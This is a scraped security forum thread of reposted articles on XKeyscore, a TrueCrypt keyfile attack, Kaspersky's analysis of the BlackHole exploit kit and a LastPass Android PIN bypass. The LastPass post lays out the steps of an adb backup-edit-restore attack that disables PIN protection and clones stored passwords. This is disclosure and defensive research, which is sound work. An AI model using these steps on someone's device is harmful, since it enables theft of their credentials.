there are multiple technical, manual, and supervisory checks and balances within the system to prevent deliberate misuse from occurring.” “Every search by an NSA analyst is fully auditable, to ensure that they are proper and within the law. “These types of programs allow us to collect the information that enables us to perform our missions successfully—to defend the nation and to protect U.S. and allied troops abroad.” What’s more? Many more aspects of the XKeyscore are not revealed in depth, such as with which countries the U.S. shares information, how the program contends with encrypted contents, the evolving of the program in recent years. Despite all this, the government claims some real benefits, such as 300 terrorists captured by 2008. References: http://www.theguardian.com/world/2013/jul/31/nsa-top-secret-program-online-data http://nakedsecurity.sophos.com/2013/08/02/nsas-xkeyscore-is-a-global-dragnet-for-vulnerable-systems/ http://www.infowars.com/xkeyscore-instrument-of-mass-surveillance/ https://blog.fortinet.com/NSA-s-XKeyscore–the-FAQ/ http://www.huffingtonpost.com/sam-dorison/nsa-data-hacking_b_3708206.html http://en.wikipedia.org/wiki/XKeyscore http://www.schneier.com/blog/archives/2013/08/xkeyscore.html http://techcrunch.com/2013/07/31/nsa-project-x-keyscore-collects-nearly-everything-you-do-on-the-internet/ http://www.thehindu.com/news/international/world/nsas-xkeyscore-surveillance-program-has-servers-in-india/article4978248.ece http://assets.zocalo.com.mx/uploads/articles/6/137178470253.jpg http://www1.pcmag.com/media/images/394651-xkeyscore-450.jpg?thumb=y Sursa: http://resources.infosecinstitute.com/xkeyscore-nsas-surveillance-program/ Ok, presupunem ca NSA sau mai stiu eu cine poate intercepta tot traficul. Imi place in mod special o idee din articol: The slides explain how XKeyscore can track encrypted virtual private networks (VPN) sessions and their participants, can capture metadata on who’s using PGP (pretty good privacy) in email or who is encrypting their Word documents, which later can be decrypted. Cu alte cuvinte, daca folosesti VPN, PGP in mail sau cryptezi documente... esti suspect? Adica sunt sanse mult mai mici sa te bage in seama daca, aparent, te comporti ca un user "normal", fara sa cryptezi documente si mail-uri?
  16. Security Analysis of TrueCrypt 7.0a with an Attack on the Keyfile Algorithm Ubuntu Privacy Remix Team <info@privacy-cd.org> August 14, 2011 Contents Preface.............................................................................................................................................1 1. Data of the Program.....................................................................................................................2 2. Remarks on Binary Packages of TrueCrypt 7.0a..........................................................................3 3. Compiling TrueCrypt 7.0a from Sources.......................................................................................3 Compiling TrueCrypt 7.0a on Linux..............................................................................................3 Compiling TrueCrypt 7.0a on Windows........................................................................................4 4. Methodology of Analysis...............................................................................................................5 5. The program tcanalyzer................................................................................................................6 6. Findings of Analysis......................................................................................................................7 The TrueCrypt License.................................................................................................................7 Website and Documentation of TrueCrypt...................................................................................7 Cryptographic Algorithms of TrueCrypt........................................................................................8 Cryptographic Modes used by TrueCrypt.....................................................................................9 TrueCrypt Volume and Hidden Volumes.....................................................................................11 The Random Number Generator of TrueCrypt...........................................................................11 The Format of TrueCrypt Volumes.............................................................................................12 7. An Attack on TrueCrypt Keyfiles.................................................................................................14 The TrueCrypt Keyfile Algorithm................................................................................................14 The Manipulation of TrueCrypt Keyfiles.....................................................................................14 Response to the Attack by the TrueCrypt Developers................................................................16 8. Conclusion..................................................................................................................................17 Preface We previously have analyzed versions 4.2a, 6.1a and 6.3a of the TrueCrypt program in source code without publishing our results. Now however, for our new analysis of version 7.0a we decided to publish it. We hope that it will help people to form their own sound opinion on the security of TrueCrypt. Moreover, we solicit help in correcting any mistakes that we've made. To this end, we would like to encourage everyone reading this to send criticism or suggestions for further analysis to us. While preparing the analysis for publication we reassessed our previous results. In doing so we discovered major weaknesses in the TrueCrypt keyfile algorithm. This could even be turned into a successful attack on TrueCrypt keyfiles. We present that attack in section 7. We want to stress that the security of TrueCrypt containers which do not use keyfiles is in no way affected by this weaknesses and the attack. TrueCrypt is a multi-platform program. Up to now there are versions for Windows, Linux and Mac OS X. Our analysis mainly focuses on the Linux version. The Windows version has been analyzed to a lesser extent, the Mac OS X version not at all. In large parts the code basis is the same for all operating systems on which TrueCrypt runs. On the other hand there is some special code for each of these operating systems. This is even reflected in slightly diverging behavior of the program on different operating systems here and there. In the source code of TrueCrypt 7.0a there are, moreover, folders for the operating systems Free- BSD and Solaris. Apparently the source code in these folders hasn't reached a point where a program could be built and distributed from it. Therefore, we completely neglected them. The report at hand explains the results of our analysis. It is organized as follows: Section 1 lists some data of the analyzed program. Section 2 contains remarks on binary TrueCrypt packages. Section 3 deals with compiling TrueCrypt from the sources. Section 4 explains the methodology of our analysis. In section 5 we describe our program tcanalyzer which has been written for this analysis. Section 6 contains our findings in detail except for the attack on keyfiles to which section 7 is devoted. Finally section 8 presents our conclusions. The rational for the conclusions in section 8 is mainly presented in section 6. In sections 6 and 7 some elaborated technical or mathematical facts have been documented in the footnotes. Readers who don't have the special skills to understand them may safely ignore them. Download: https://www.privacy-cd.org/downloads/truecrypt_7.0a-analysis-en.pdf
  17. Filling a BlackHole Exploit packs. In the black hole. An exploit pack’s start page. Exploit for CVE-2012-5076. Exploit for CVE-2012-0507. Exploit for CVE-2013-0422. Three-in-one. [*]Protection from Java exploits. Stage one: block redirects to the landing page. Stage two: detection by the file antivirus module. Stage three: signature-based detection of exploits. Stage four: proactive detection of exploits. Stage five: detection of the downloaded malware (payload). [*]Conclusion. Today, exploiting vulnerabilities in legitimate programs is one of the most popular methods of infecting computers. According to our data, user machines are most often attacked using exploits for Oracle Java vulnerabilities. Today’s security solutions, however, are capable of effectively withstanding drive-by attacks conducted with the help of exploit packs. In this article, we discuss how a computer can be infected using the BlackHole exploit kit and the relevant protection mechanisms that can be employed. Exploit packs. As a rule, instead of using a single exploit, attackers employ ready-made sets known as exploit packs. This helps them to significantly increase the effectiveness of ‘penetration’, since each attack can utilize one or more exploits for software vulnerabilities present on the computer being attacked. Whereas in the past exploits and malicious programs downloaded with their help to victims’ computers were created by the same people, today this segment of the black market operates according to the SaaS (Software as a Service) model. As a result of the division of labor, each group of cybercriminals specializes in its own area: some create and sell exploit packs, others lure users to exploit start pages (drive traffic), still others write the malware that is distributed via drive-by attacks. Today, all a cybercriminal wishing to infect user machines with, say, a variant of the ZeuS Trojan needs to do is buy a ready-made exploit pack, set it up and get as many potential victims as possible to visit the start page (also called a landing page). Attackers use several methods to redirect users to an exploit pack’s landing page. The most dangerous one for users is hacking pages of legitimate websites and injecting scripts or iframe elements into their code. In such cases, it is enough for a user to visit a familiar site for a drive-by attack to be launched and for an exploit pack to begin working surreptitiously. Cybercriminals can also use legitimate advertising systems, linking banners and teasers to malicious pages. Another method that is popular among cybercriminals is distributing links to the landing page in spam. Infecting user machines using exploit packs: an overview diagram There are numerous exploit packs available on the market: Nuclear Pack, Styx Pack, BlackHole, Sakura and others. In spite of the different names, all these ‘solutions’ work in the same way: each exploit pack includes a variety of exploits plus an administrator panel. Moreover, the operation of all exploit packs is based on what is essentially the same algorithm. One of the best-known exploit packs on the market is called BlackHole. It includes exploits for vulnerabilities in Adobe Reader, Adobe Flash Player and Oracle Java. For maximum effect, exploits included in the pack are constantly modified. In early 2013, we studied three exploits for Oracle Java from the BlackHole pack, so we selected BlackHole to illustrate the operating principles of exploit packs. In the black hole. It should be noted that all data on exploits, the contents of start pages and other specific information discussed in this article (particularly the names of methods and classes and the values of constants) was valid at the time the research was carried out. Cybercriminals are still actively developing BlackHole: they often modify the code of one exploit or another to hinder detection by anti-malware solutions. For example, they may change the decryption algorithm used by one of the exploits. As a result, some of the code may differ from that shown in the examples below; however, the underlying principles of operation will remain the same. [TABLE] [TR] [TD] We print all changeable data in small type.[/TD] [/TR] [/TABLE] An exploit pack’s start page. An exploit pack’s start page is used to determine input parameters and make decisions on the exploit pack’s further actions. Input parameters include the version of the operating system on the user machine, browser and plugin versions, system language etc. As a rule, the exploits to be employed in attacking a system are selected based on the input parameters. If the software required by the exploit pack is not present on the target computer, an attack does not take place. Another reason an attack may not take place is to prevent the exploit pack’s contents from falling into the hands of experts at anti-malware companies or other researchers. For example, cybercriminals may ‘blacklist’ IP addresses used by research companies (crawlers, robots, proxy servers), block exploits from launching on virtual machines, etc. The screenshot below shows a sample of code from the landing page of the BlackHole exploit kit. Screenshot of code from the BlackHole exploit kit’s start page Even a brief look at the screenshot is sufficient to see that the JavaScript code is obfuscated and most information is encrypted. Visiting the start page will result in execution of the code that was originally encrypted. [TABLE] [TR] [TD] Algorithm for decrypting the JavaScript code that was in use in January 2013: populate variables “z1 – zn” with encrypted data, then concatenate these variables into one string and decrypt the data as follows: every two characters (the character “-” is ignored) are considered to make up a 27-ary number, which is converted to decimal; add “57” to the value obtained and divide the result by 5; convert the resulting number back to a character using the function “fromCharCode”. The code which performs these operations is marked with blue ovals on the screenshot above. The second array consists of decimal numbers from 0 to 255, which are converted to characters using the ASCII table. Both code fragments obtained by conversion are executed using the “eval” command (shown on the screenshot with red arrows).[/TD] [/TR] [/TABLE] The entire algorithm above could have been implemented with a few lines of code, but the cybercriminals used special techniques (marked with yellow ovals in the screenshot) to make detection more difficult: deliberately causing an exception with the “document.body*=document” command; checking the style of the first <div> element using the command “document.getElementsByTagName("d"+"iv")[0].style.left===""”; note that an empty <div> element is inserted for this purpose into the document (in the second line); calling “if(123)”, which makes no sense, since this expression is always true; breaking up function names and subsequently concatenating the parts. In addition to the tricks described above, cybercriminals use numerous minor code changes that can hamper signature-based detection. Although our antivirus engine, for example, includes a script emulator and simple changes in constants and operations will not affect the effectiveness of detection, the tricks described above can make things more difficult for an emulator, too. After decryption, code appears in RAM — we will refer to it as the “decrypted script”. It consists of two parts. The first part is a module based on the free PluginDetect library, which can be used to determine the versions and capabilities of most modern browsers and their plugins. Cybercriminals use a variety of libraries, but this module is a key element of any exploit pack. BlackHole uses PluginDetect to select the appropriate exploits for download depending on the software installed on the user machine. By ‘appropriate’ we mean those exploits which have the highest chances of successfully running and launching malware on a specific PC. The second part of the “decrypted script” is code responsible for processing the results produced by PluginDetect functions and then downloading the exploits selected and launching them. In March 2013, BlackHole used exploits for the following vulnerabilities: Java versions from 1.7 to 1.7.?.8 – CVE-2012-5076; Java versions below 1.6 or from 1.6 to 1.6.?.32 – CVE-2012-0507; Java versions from 1.7.?.8 to 1.7.?.10 – CVE-2013-0422; Adobe Reader versions below 8 – CVE-2008-2992; Adobe Reader version 8 or from 9 to 9.3 – CVE-2010-0188; Adobe Flash versions from 10 to 10.2.158 – CVE-2011-0559; Adobe Flash versions from 10.3.181.0 to 10.3.181.23 and below 10.3.181 – CVE-2011-2110. Below we discuss exploits for Java vulnerabilities. Exploit for CVE-2012-5076. Technical details Exploit for CVE-2012-0507. Technical details Exploit for CVE-2013-0422. Technical details Three-in-one. As discussed above, three Java exploits are based essentially on the same mechanism: they obtain privileges and load the payload, which downloads and launches the target file. The three exploits also generate the same Java class file. This clearly indicates that the same person or people were behind the development of these three exploits. The only difference is the technique used to obtain unrestricted privileges for a class file. The class file can download and launch files, decrypting parameters passed via the decrypted script. To make detection more difficult, the malicious file downloaded is usually encrypted and, consequently, does not start with a PE header. The file downloaded is usually decrypted in memory using the XOR algorithm. Passing parameters via the decrypted script is a convenient way of quickly changing the links pointing to the payload: all this takes is to modify data on the exploit pack’s landing page without having to recompile the malicious Java applet. The three vulnerabilities discussed above are so-called logical flaws. It is impossible to control exploits for such vulnerabilities using such automatic tools as those monitoring memory integrity or the generation of exceptions. This means that such exploits cannot be detected using Microsoft’s DEP or ALSR technologies or other similar automatic tools. However, there are technologies that can cope with this – an example is Kaspersky Lab’s Automatic Exploit Prevention (AEP). Protection from Java exploits. In spite of all the efforts by cybercriminals, today’s security solutions can effectively block drive-by attacks conducted using exploit packs. As a rule, protection against exploits includes an integrated set of technologies that block such attacks at different stages. Above, we provided a description of the BlackHole exploit kit’s operating principles. Now we will demonstrate, using Kaspersky Lab solutions as an example, how protection is provided at each stage of an attack using Java exploits from BlackHole. Since the way other exploit packs operate is similar to that implemented in BlackHole, the protection structure discussed here can be applied to them, as well. Staged protection against a drive-by attack Below we discuss which protection components interact with malicious code and when. Stage one: block redirects to the landing page. An attack starts as soon as the user reaches the exploit pack’s landing page. However, the security solution’s web antivirus component can block an attack even before it starts, i.e., before a script on the landing page is launched. This protection component verifies the address of the web page before it is opened. Essentially, this is a simple check of the page’s URL against a database of malicious links, but it can block the user from visiting the exploit pack’s landing page, provided that its address is already known to belong to a malicious resource. This makes it essential for antivirus vendors to add malicious links to their databases as early as possible. Malicious URL databases can be located on user machines or in the cloud (i.e., on a remote server). In the latter case, cloud technologies help to minimize the time lag before a security product begins to block new malicious links. The ‘response time’ is reduced in this case because the security solution installed on the user machine receives information about a new threat as soon as the relevant record is added to the malicious links database, without having to wait for an antivirus database update. Cybercriminals in turn try to change domains used to host exploit pack landing pages very often to prevent security software from blocking these pages. This ultimately reduces the profitability of their business. Stage two: detection by the file antivirus module. If the user has after all reached an exploit pack’s landing page, this is where components of the file antivirus module – the static detector and the heuristic analyzer – come in. They scan the exploit pack’s landing page for malicious code. Below we analyze the operating principles, advantages and shortcomings of each component. The static detector uses static signatures to detect malicious code. Such signatures are triggered only by specific code fragments, essentially by specific byte sequences. This is the threat detection method that was used in the early antivirus solutions and its advantages are well known. They include high performance and ease of storing signatures. All a detector needs to do to come up with a verdict is compare the checksum or byte sequence of the code being analyzed to the relevant records in the antivirus database. Signatures are tens of bytes in size and easily packed, making them easy to store. The most significant shortcoming of a static detector is the ease with which a signature can be ‘evaded’. All the cybercriminals have to do to make the detector stop detecting an object is change just one byte. This shortcoming leads to another one: a large number of signatures is needed to cover a large number of files, which means that the databases rapidly grow in size. The heuristic analyzer also uses databases, but works according to a completely different operating principle. It is based on analyzing objects: collecting and intelligently parsing object data, identifying patterns, computing statistics etc. If the data produced as a result of this analysis matches a heuristic signature, the object is detected as malicious. The main advantage of a heuristic signature is that it enables the solution to detect a large number of similar objects provided that the differences between them are not too great. The drawback is that compared to processing static signatures, the heuristic analyzer can be slower and affect system performance. For example, if a heuristic signature is not designed efficiently, i.e., if it requires a large number of operations to perform its checks, this may affect system performance on the machine on which the antivirus solution is running. To prevent an object from being detected using a static signature, cybercriminals need to make minimal changes to the object’s code (script, executable program or file). This process can to some extent be automated. To evade heuristic detection, a malware writer needs to conduct research to find out what mechanism is used to detect the object. When the algorithm has been fully or partially analyzed, changes preventing the heuristic signature from being triggered must be made to the malicious object’s code. Clearly, ‘evading’ a heuristic signature inevitably takes cybercriminals longer than preventing detection using static signatures. This means that heuristic signatures have a longer ‘life span’. On the other hand, after malware writers have modified an object to evade heuristic detection, it also takes an antivirus vendor some time to create a different signature. As discussed above, an anti-malware solution uses different sets of signatures to scan the landing page. In their turn, malware writers modify objects on the exploit pack’s start page in order to evade signature-based detection of both types. While it is sufficient to simply break strings up into characters to evade static signatures, evading heuristics requires making use of the finer features offered by JavaScript – unusual functions, comparisons, logical expressions, etc. An example of this type of obfuscation was provided in the first part of the article. It is at this stage that malware is often detected, particularly due to excessive code obfuscation that can be regarded as a characteristic feature of malicious objects. In addition to databases stored on the computer’s hard drive, there are signatures located in the cloud. Such signatures are usually very simple, but the extremely short new-threat response time (up to five minutes from creating a signature to making it available in the cloud) means that user machines are well protected. Stage three: signature-based detection of exploits. If the security solution fails to recognize the start page of the exploit pack, the latter comes into operation. It checks which browser plugins are installed (Adobe Flash Player, Adobe Reader, Oracle Java, etc.) and makes a decision as to which exploits will be downloaded and launched. The security solution will scan each exploit being downloaded in the same way as it did the exploit pack’s landing page – using the file antivirus module and cloud-based signatures. The attackers in their turn try to evade detection using certain techniques, which are similar to those described above. Stage four: proactive detection of exploits. If none of the components responsible for reactive (signature-based) protection has detected anything suspicious while scanning the exploit pack’s contents and an exploit has launched, this is where proactive protection modules come in. They monitor the behavior of applications in the system in real time and identify any malicious activity. Each application is categorized, based on information provided by heuristic analysis, data from the cloud and other criteria, as “Trusted”, “Low Restricted”, “High Restricted” or “Untrusted”. Application Control restricts each application’s activity based on its category. Applications in the Trusted class are allowed all types of activity, those in the Low Restricted group are denied access to such resources as password storage, programs in the High Restricted category are not allowed to make changes to system folders, etc. All the applications being launched and all those running are analyzed by a module called Application Control in Kaspersky Lab products. This component monitors program execution in the system using low-level hooks. In addition to the above, so-called behavior stream signatures (BSS) describing malicious activity are used to detect the dangerous behavior of applications. Such signatures are developed by virus analysts and are subsequently compared to the behavior of active applications. This enables proactive protection to detect new malware versions that were not included in the Untrusted or High Restricted categories. It should be noted that this type of detection is the most effective, since it is based on analyzing data on applications’ actual current activity rather than static or heuristic analysis. It renders such techniques as code obfuscation and encryption completely ineffective, because they in no way affect the behavior of a malicious program. For more stringent control of applications to prevent their vulnerabilities from being exploited, we use a technology called Automatic Exploit Prevention (AEP). The AEP component monitors each process as it is launched in the system. Specifically, it checks the call stack for anomalies, checks the code which launched each process, etc. In addition, it performs selective checks of dynamic libraries loaded into processes. All this prevents malicious processes from being launched as a result of exploiting vulnerabilities. This is in fact the last line of defense, providing protection against exploits in the event that other protection components have failed. If an application, such as Oracle Java or Adobe Reader, behaves suspiciously as a result of exploitation, the vulnerable legitimate application will be blocked by the anti-malware solution, preventing the exploit from doing harm. Since protection at this stage is based on the program’s behavior, cybercriminals have to use sophisticated and labor-intensive techniques to evade proactive protection. Stage five: detection of the downloaded malware (payload). If an exploit does go undetected, it attempts to download the payload and run it on the user machine. As we wrote above, the malicious file is usually encrypted to make detection more difficult, which means that it does not begin with a PE header. The file downloaded is usually decrypted in memory using the XOR algorithm. Then the file is either launched from memory (usually, this is a dynamic library) or dropped on the hard drive and then launched from the hard drive. The trick of downloading an encrypted PE file enables the malware to fool antivirus solutions, because such downloads look like ordinary data streams. However, it is essential that the exploit launches a decrypted executable file on the user machine. And an anti-malware solution will subject that file to all the various protection technologies discussed above. Conclusion. Exploit packs are an integrated system for attacking victim machines. Cybercriminals devote a lot of time and effort to maintain the effectiveness of exploit packs and minimize detections. In their turn, anti-malware companies are continually improving their security solutions. Anti-malware vendors now have a range of technologies that can block drive-by attacks at all stages, including those involving exploitation of vulnerabilities. Sursa: https://www.securelist.com/en/analysis/204792303/Filling_a_BlackHole
  18. [h=1]Reclamele ne pot bombarda in somn. Se intampla deja in Germania. VIDEO[/h] Pasagerii care merg cu trenul si-si sprijina capul de fereastra sunt treziti de o voce care le prezinta un nou produs sau serviciu. Si mai mare le e mirarea atunci cand isi dau seama ca doar ei aud mesajul. Tehnologia care face totul posibil se numeste "conductie osoasa"si, in urmatorii ani, ar putea fi prezenta in majoritatea trenurilor si autobuzelor, potrivit stirileprotv.ro. Cu gandul la navetistii care locuiesc in suburbii, o agentie de publicitate din Dusseldorf a venit cu o propunere inedita. "Fereastra vorbitoare", care parca ar comunica telepatic, numai cu cei care-si ating capul de geam. Din senin, pasagerii carora capul le aluneca in somn si se sprijina de fereastra aud un mesaj publicitar. Cand isi dau seama ca geamul le "vorbeste", majoritatea verifica reactia celor din jur. Sunt cu adevarat surprinsi cand isi dau seama ca sunt singurii din vagon care aud mesajul. Totul e posibil datorita unui mic dispozitiv plasat pe fereastra, programat sa vibreze cand simte o presiune. Sebastian Hardieck, departamentul de creatie: "Un os din corp vibreaza, iar urechea interpreteaza apoi acele vibratii cu frecventa inalta si le transforma in sunet. Iti apropii capul de fereastra si nu auzi niciun sunet, dar urechea parca tot le aude... Este foarte interesant." Tehnologia se numeste "conductie osoasa" si permite transmiterea sunetelor prin vibratia oaselor craniene. Desi unii sustin ca asa arata publicitatea viitorului, nu toata lumea e incantanta de idee. Matthias Oomen, asociatie pentru transportul public: "Nu ne amuza deloc ideea unei ferestre care vorbeste. Transportul public are multe avantaje, iar unul dintre ele e ca poti calatori linistit. Problema aceasta e la fel de importanta precum pretul biletelor sau siguranta pasagerilor." Ideea face valva deocamdata doar pe internet, dar doua treimi din comentariile adunate sunt negative. Unii chiar cer boicotarea companiilor care vor folosi o astfel de tehnologie pentru a-si promova produsele. Sursa: Reclamele ne pot bombarda in somn. Se intampla deja in Germania. VIDEO - www.yoda.ro
  19. Si daca toate lucrurile astea care se spun despre NSA sunt inventate pentru ca noi sa punem mai mult accentul pe securitate?
  20. Unde a mai fost facut public inainte?
  21. Stopped working. ?
  22. A sneak peek into Android “Secure” Containers Posted by ChrisJohnRiley on September 5, 2013 It’s been a bit quiet here on the blog, so I thought I’d take a few minutes to write up an issue I raised with the fine folks over at LastPass . Alongside the HTTP Response Code stuff, I’ve been playing around more and more with Android applications. One of the things I presented on in Vegas at the BSidesLV Underground track was breaking into Android Secure Containers. The name of the talk was cryptic for sure, mostly because said “secure” containers were anything but secure, and because I hadn’t had time to report the issues to the effected vendors. The issues I discussed weren’t tied to a single application, and effect numerous apps within the Play Store… So, here we are a month later, and LastPass has rolled out a “fix” for the issue I reported to them. This means I can give you the down and dirty details now that you’ve all updated your Android devices to the latest LastPass version (currently 2.5.1). FYI: the CVE numbers for these issues although not referenced in the LastPass changelogs as yet are CVE-2013-5113 and CVE-2013-5114. This research needs a little back story to explain it, so bear with me for a minute while I set the stage. Back Story / Testing Scenario I started down this research track when I was looking at how Android applications provide additional security through PIN and/or password protection of specific applications. This additional layer of security offered by applications like LastPass is there to stop people who have physical access to your Android device from getting into the more secure areas of your data (e.g. Passwords). With this in mind I expected the implementation of these protections to be designed to stand up to an attacker with physical access to the device (aka. somebody who’s stolen/borrowed/found your Android device). Some Facts Without root access to the android device, it’s not directly possible to view or alter the data of specific applications. Even if USB Debugging is enabled (by the owner, or later by an attacker with device access) it’s only possible to view specific data on the Android device, not all the juicy stuff. Everything I’m about to discuss is possible based on a non-rooted device, however USB debugging needs to be enabled to allow us to interact with the device using adb. Remember, the scenario we’re talking about here is physical device access, so this shouldn’t be a big hurdle. Note: It goes without saying that everything that can be achieved here with ADB /USB Debugging can also be achieved through exploitation of the device… although, there are much more fun things to do if you’re popping shell on a device The LastPass Case LastPass allows a user to save their password within the Android application so that you don’t need to type it every time you open the app. This isn’t abnormal for applications, and like any good security minded application they give you options to secure the access using something other than your long long password (aka… the PIN). Given my experience, users of such applications have too much faith in the security of their devices and have no desire to type in their 32 character random LastPass password whenever they open the application (have you tried that on a handheld device? Yhea, not fun…). Much better to store the password in the secure container settings and assign a PIN to protect the app (because that’s secure!). So with the back story and the explanation out the way, here’s the meat of the issue The Meat When I first started testing LastPass on the Android (version 2.0.4 at the time) I noticed something interesting about the AndroidManifest. In particular the android:allBackup was set to True, meaning that even though I couldn’t read or edit the configuration/settings of LastPass directly on the device (remember, non-rooted device) or via ADB (remember, USB debugging enabled, but even then no direct access), I could perform backup and restore operations via ADB. This led me down the trail of learning more about the “adb backup” command (introduced in Android ICS). What makes adb backup and restore so useful in this context, is the ability to not only backup a device entirely over USB, but also to specifically backup individual application data (with or without the APK file). This makes the backup and restore much more flexible for what we’re looking at doing. After all, backing up an entire 16GB device every time gets tiring (I’m looking at you iOS). By performing an adb backup (command: adb backup com.lastpass.lpandroid -apk) and accepting the prompt on the device, you end up with a backup.ab file containing the LastPass application (APK) and the data/configuration/settings from the application. There have been numerous discussions on the format used by Android Backup files, but I wasn’t happy with any of the solutions offered to decrypt the AB files into something usable. So I decided to automate the lengthy process in Python (see BSidesLV: Android Backup [un]packer release | C????²² (in)s??u?it? / ChrisJohnRiley) and add in some features to ease things a little. The final result is a directory output of the LastPass application (with or without the APK – your choice – screenshot is without APK). Taking a look at the files the sp/LPandroid.xml quickly stood out as worth further analysis. As expected the configuration file contained the username and password in encoded format (if saved within the LastPass app). Alongside this the XML also contains an encoded version of the PIN and various other application settings. Putting aside the possibility to decode the password and PIN, a few settings caught my eye for easy wins: reprompt_tries This is a simple integar that increases as incorrect PINs are entered passwordrepromptonactive pincodeforreprompt (holds encoded PIN) requirepin These control the password reprompt on startup and the PIN protection (yeah, you can see where this is going already) The Story So Far We have access to the LastPass configuration of a non-rooted device via adb backup… and we can fiddle with the resulting configuration file. However we’re still playing about with the XML inside a backup and not with the device itself. We need to get the changes back into the device Next Step Using more Python trickery goodness (see BSidesLV: Android Backup [un]packer release | C????²² (in)s??u?it? / ChrisJohnRiley) we can take the directory structure created and rebuild the Android Backup file (with the changes that we’ve made to the files of course). Then we can restore the backup to the device (if you still have access to it) or to your own device/emulator (make sure you have the APK in the backup file or the app already installed if you want to restore to another device). Effects As expected, playing with the reprompt_tries by setting it to a minus number (-9999 for example) allows you to bypass the 5 PIN attempts before wipe feature of LastPass. This essentially gives you 10,000 retries. If you can’t guess a 4 digit PIN in 10,000 retries, then nothing can help you However, the easier and more fun option is the pincodeforreprompt / passwordrepromptonactive and requirepin alteration which results in the LastPass application not requiring a PIN for entry anymore. Backup configuration and unpack Alter XML settings as required Pack configuration and restore <<< Profit >>> After-effects Some of the more eagle eyed amongst you may have already noticed another interesting attack vector here. The ability to backup LastPass from a device (within 30 seconds if you’re handy ;) and return the device to the owner, coupled with the freedom to restore said backup to an attacker controlled device, makes the attack much more interesting. Not only can you do this, bypass the PIN in your own time, and then read and extract the stored passwords as desired. You can also maintain access to the users LastPass account until such time as they change their LastPass password itself. If the original owner alters their any of the passwords their store in the LastPass service, the attacker can simply close and restart the cloned Android container to update the information from LastPass’ servers. Note: Version 2.5.1 mentions an alteration in the way LastPass creates UUIDs. This may effect this cloning attack – as yet unconfirmed Round 2 – It’s not over yet You may have noticed the use of quotes around “fix” at the beginning of this post… After LastPass got back to me to say they’d fixed the issue (actually they responded to say they’d fixed it the day before I reported it as they’d disabled allowBackup and not pushed it to the Play Store yet), I started looking at the proposed fix and possible bypasses based on the same physical access scenario. After a few false starts I have a working bypass for their fix that once again allows the attack (with an additional step). Once they’ve fixed the fix, I’ll let you guys know how that one went down Until then, make sure you upgrade your Lastpass to the latest Play Store version (2.5.1 at this time) and keep an eye out for further fixes! Links: android:allowBackup > R.attr | Android Developers Android ADB > Android Debug Bridge | Android Developers Python scripts for easier Android Backup fiddling > BSidesLV: Android Backup [un]packer release | C????²² (in)s??u?it? / ChrisJohnRiley Lastpass Android (Play Store) > https://play.google.com/store/apps/details?id=com.lastpass.lpandroid Sursa: A sneak peek into Android “Secure” Containers | C????²² (in)s??u?it? / ChrisJohnRiley
  23. [h=2]What Is SHA-3 Good For?[/h] Cryptographers are excited because NIST have announced the selection of SHA-3. There are various reasons to like SHA-3, perhaps most importantly because it uses a different design from its predecessors, so attacks that work against them are unlikely to work against it. But if I were paranoid, there’d be something else I’d be thinking about: SHA-3 is particularly fast in hardware. So what’s bad about that? Well, in practice, on most platforms, this is not actually particularly useful: it is quite expensive to get data out of your CPU and into special-purpose hardware – so expensive that hardware offload of hashing is completely unheard of. In fact, even more expensive crypto is hardly worth offloading, which is why specialist crypto hardware manufacturers tend to concentrate on the lucrative HSM market, rather than on accelerators, these days. So, who benefits from high speed hardware? In practice, it mostly seems to be attackers – for example, if I want to crack a large number of hashed passwords, then it is useful to build special hardware to do so. It is notable, at least to the paranoid, that the other recent crypto competition by NIST, AES, was also hardware friendly – but again, in a way useful mostly to attackers. In particular, AES is very fast to key – this is a property that is almost completely useless for defence, but, once more, great if you have some encrypted stuff that you are hoping to crack. The question is, who stands to benefit from this? Well, there is a certain agency who are building a giant data centre who might just like us all to be using crypto that’s easy to attack if you have sufficient resource, and who have a history of working with NIST. Just sayin’. Sursa: Links
  24. [h=2]OS X Auditor- Mac Forensics Tool[/h]September 8th, 2013 Mourad Ben Lakhoua OS X Auditor is a python based computer forensics tool. The tool allows analysts to parse and hash artifacts on the running system or a copy of a system to not modify the original evidence. the program will look at: the kernel extensions the system agents and daemons the third party’s agents and daemons the old and deprecated system and third party’s startup items the users’ agents the users’ downloaded files the installed applications It also extracts: the users’ quarantined files the users’ Safari history, downloads, topsites, HTML5 databases and localstore the users’ Firefox cookies, downloads, formhistory, permissions, places and signons the users’ Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage the users’ social and email accounts the WiFi access points the audited system has been connected to (and tries to geolocate them) This beside looking for suspicious keywords in the .plist themselves. It can verify the reputation of each file on Team Cymru’s MHR,VirusTotal ,Malware.lu or your own local database. You can also aggregate all logs from the following directories /var/log (-> /private/var/log) , /Library/logs , the user’s ~/Library/logs into a zipball. Finally, the results can be rendered as a simple txt log file (so you can cat-pipe-grep in them… or just grep), rendered as a HTML log file or sent to a Syslog server. You can download the tool by following this link. Sursa: OS X Auditor- Mac Forensics Tool | SecTechno
×
×
  • Create New...